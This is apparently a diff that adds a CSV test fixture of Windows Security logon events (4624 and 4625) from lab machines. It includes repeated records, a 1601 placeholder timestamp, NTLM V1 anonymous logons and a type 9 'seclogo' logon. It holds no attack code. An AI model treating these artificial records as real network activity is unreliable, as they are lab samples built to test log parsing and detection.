+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988550
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x568d99
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64229
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988547
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56874b
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64227
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988544
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x5686d9
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64226
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988535
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567758
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988529
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567515
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.25
+ 50251
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988525
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56738f
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64223
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988522
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-84104
+ 02694W-WIN10$
+ THREEBEESCO.COM
+ 0x567343
+ 3
+ Kerberos
+ Kerberos
+ -
+ 429CA5A3-EDFC-5657-17C3-C050C7B047F4
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.25
+ 50250
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772611
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1137987
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50107
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772609
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x244
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772607
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1136e95
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50106
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:32:10.232423+04:00,1600198330.232423,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768628
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x32a0d3
+ 3
+ Kerberos
+ Kerberos
+ -
+ 6747BCF0-DBAA-F21C-878B-EB339B03FA80
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50441
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:34.957514+04:00,1600198294.957514,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768627
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x329baa
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50443
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:31.097681+04:00,1600198291.097681,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768622
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x320935
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50438
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:31:04.688967+04:00,1600198264.688967,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768621
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff89
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:30:32.190369+04:00,1600198232.190369,4624,ANONYMOUS LOGON,NT AUTHORITY,3,NtLmSsp,172.16.66.37,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768620
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-7
+ ANONYMOUS LOGON
+ NT AUTHORITY
+ 0x31ff6e
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V1
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 49707
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1843
+
+"
+2020-09-15T23:29:51.517594+04:00,1600198191.517594,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768619
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31fb1a
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50437
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-15T23:29:51.507713+04:00,1600198191.507713,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 768618
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x31daf6
+ 3
+ Kerberos
+ Kerberos
+ -
+ 1EC715BD-2DAC-8C05-8940-40F79E2D2D52
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 50436
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137225
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd964
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd8f6
+ %%1843
+
+"
+2020-09-09T17:18:27.714758+04:00,1599657507.714758,4624,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137224
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x1cd8f6
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x1cd964
+ %%1842
+
+"
+2020-09-09T17:18:27.714613+04:00,1599657507.714613,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,MSEDGEWIN10,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 137223
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x25c
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-09T17:18:25.377120+04:00,1599657505.37712,4625,IEUser,MSEDGEWIN10,2,Chrome,-,MSEDGEWIN10,MSEDGEWIN10,Security,"
+
+
+
+
+ 4625
+ 0
+ 0
+ 12544
+ 0
+ 0x8010000000000000
+
+
+ 137222
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x79e59
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0xc000006d
+ %%2313
+ 0xc000006a
+ 2
+ Chrome
+ Negotiate
+ MSEDGEWIN10
+ -
+ -
+ 0
+ 0x1358
+ C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
+ -
+ -
+
+"
+2022-02-16T14:37:25.097894+04:00,1645007845.097894,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988550
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x568d99
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64229
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.920925+04:00,1645007842.920925,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988547
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56874b
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64227
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:22.906213+04:00,1645007842.906213,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988544
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x5686d9
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64226
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.521180+04:00,1645007840.52118,4624,samir,3B,3,NtLmSsp,-,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988535
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567758
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:20.450532+04:00,1645007840.450532,4624,samir,3B,3,NtLmSsp,172.16.66.25,02694W-WIN10,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988529
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-220106
+ samir
+ 3B
+ 0x567515
+ 3
+ NtLmSsp
+ NTLM
+ 02694W-WIN10
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.25
+ 50251
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.725428+04:00,1645007839.725428,4624,01566S-WIN16-IR$,THREEBEESCO.COM,3,Kerberos,::1,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988525
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-18
+ 01566S-WIN16-IR$
+ THREEBEESCO.COM
+ 0x56738f
+ 3
+ Kerberos
+ Kerberos
+ -
+ B683BAFB-5884-30E1-12DA-31368F04511D
+ -
+ -
+ 0
+ 0x0
+ -
+ ::1
+ 64223
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-02-16T14:37:19.637257+04:00,1645007839.637257,4624,02694W-WIN10$,THREEBEESCO.COM,3,Kerberos,172.16.66.25,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 2988522
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-84104
+ 02694W-WIN10$
+ THREEBEESCO.COM
+ 0x567343
+ 3
+ Kerberos
+ Kerberos
+ -
+ 429CA5A3-EDFC-5657-17C3-C050C7B047F4
+ -
+ -
+ 0
+ 0x0
+ -
+ 172.16.66.25
+ 50250
+ %%1840
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.200140+04:00,1600879817.20014,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772611
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1137987
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50107
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:17.194314+04:00,1600879817.194314,4624,SYSTEM,NT AUTHORITY,5,Advapi,-,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772609
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-5-18
+ 01566S-WIN16-IR$
+ 3B
+ 0x3e7
+ S-1-5-18
+ SYSTEM
+ NT AUTHORITY
+ 0x3e7
+ 5
+ Advapi
+ Negotiate
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x244
+ C:\Windows\System32\services.exe
+ -
+ -
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2020-09-23T20:50:16.702981+04:00,1600879816.702981,4624,Administrator,3B,3,NtLmSsp,172.16.66.37,-,01566s-win16-ir.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 772607
+
+
+
+
+ Security
+ 01566s-win16-ir.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ 3B
+ 0x1136e95
+ 3
+ NtLmSsp
+ NTLM
+ -
+ 00000000-0000-0000-0000-000000000000
+ -
+ NTLM V2
+ 128
+ 0x0
+ -
+ 172.16.66.37
+ 50106
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 72742
+
+
+
+
+ Security
+ 02694w-win10.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ THREEBEESCO.COM
+ 0x8a38de
+ 3
+ Kerberos
+ Kerberos
+ -
+ 35D5E180-95BD-9ED7-7EFE-C355D7215A87
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50163
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2022-04-26T02:17:47.059955+04:00,1650925067.059955,4624,Administrator,THREEBEESCO.COM,3,Kerberos,127.0.0.1,-,02694w-win10.threebeesco.com,Security,"
+
+
+
+
+ 4624
+ 2
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 72742
+
+
+
+
+ Security
+ 02694w-win10.threebeesco.com
+
+
+
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ S-1-5-21-308926384-506822093-3341789130-500
+ Administrator
+ THREEBEESCO.COM
+ 0x8a38de
+ 3
+ Kerberos
+ Kerberos
+ -
+ 35D5E180-95BD-9ED7-7EFE-C355D7215A87
+ -
+ -
+ 0
+ 0x0
+ -
+ 127.0.0.1
+ 50163
+ %%1833
+ -
+ -
+ -
+ %%1843
+ 0x0
+ %%1842
+
+"
+2019-03-18T15:06:29.911579+04:00,1552907189.911579,4624,user01,EXAMPLE,9,seclogo,::1,,PC01.example.corp,Security,"
+
+
+
+
+ 4624
+ 0
+ 0
+ 12544
+ 0
+ 0x8020000000000000
+
+
+ 432903
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x18a7875
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x4530f0f
+ 9
+ seclogo
+ Negotiate
+
+ 00000000-0000-0000-0000-000000000000
+ -
+ -
+ 0
+ 0x3ec
+ C:\Windows\System32\svchost.exe
+ ::1
+ 0
+
+"
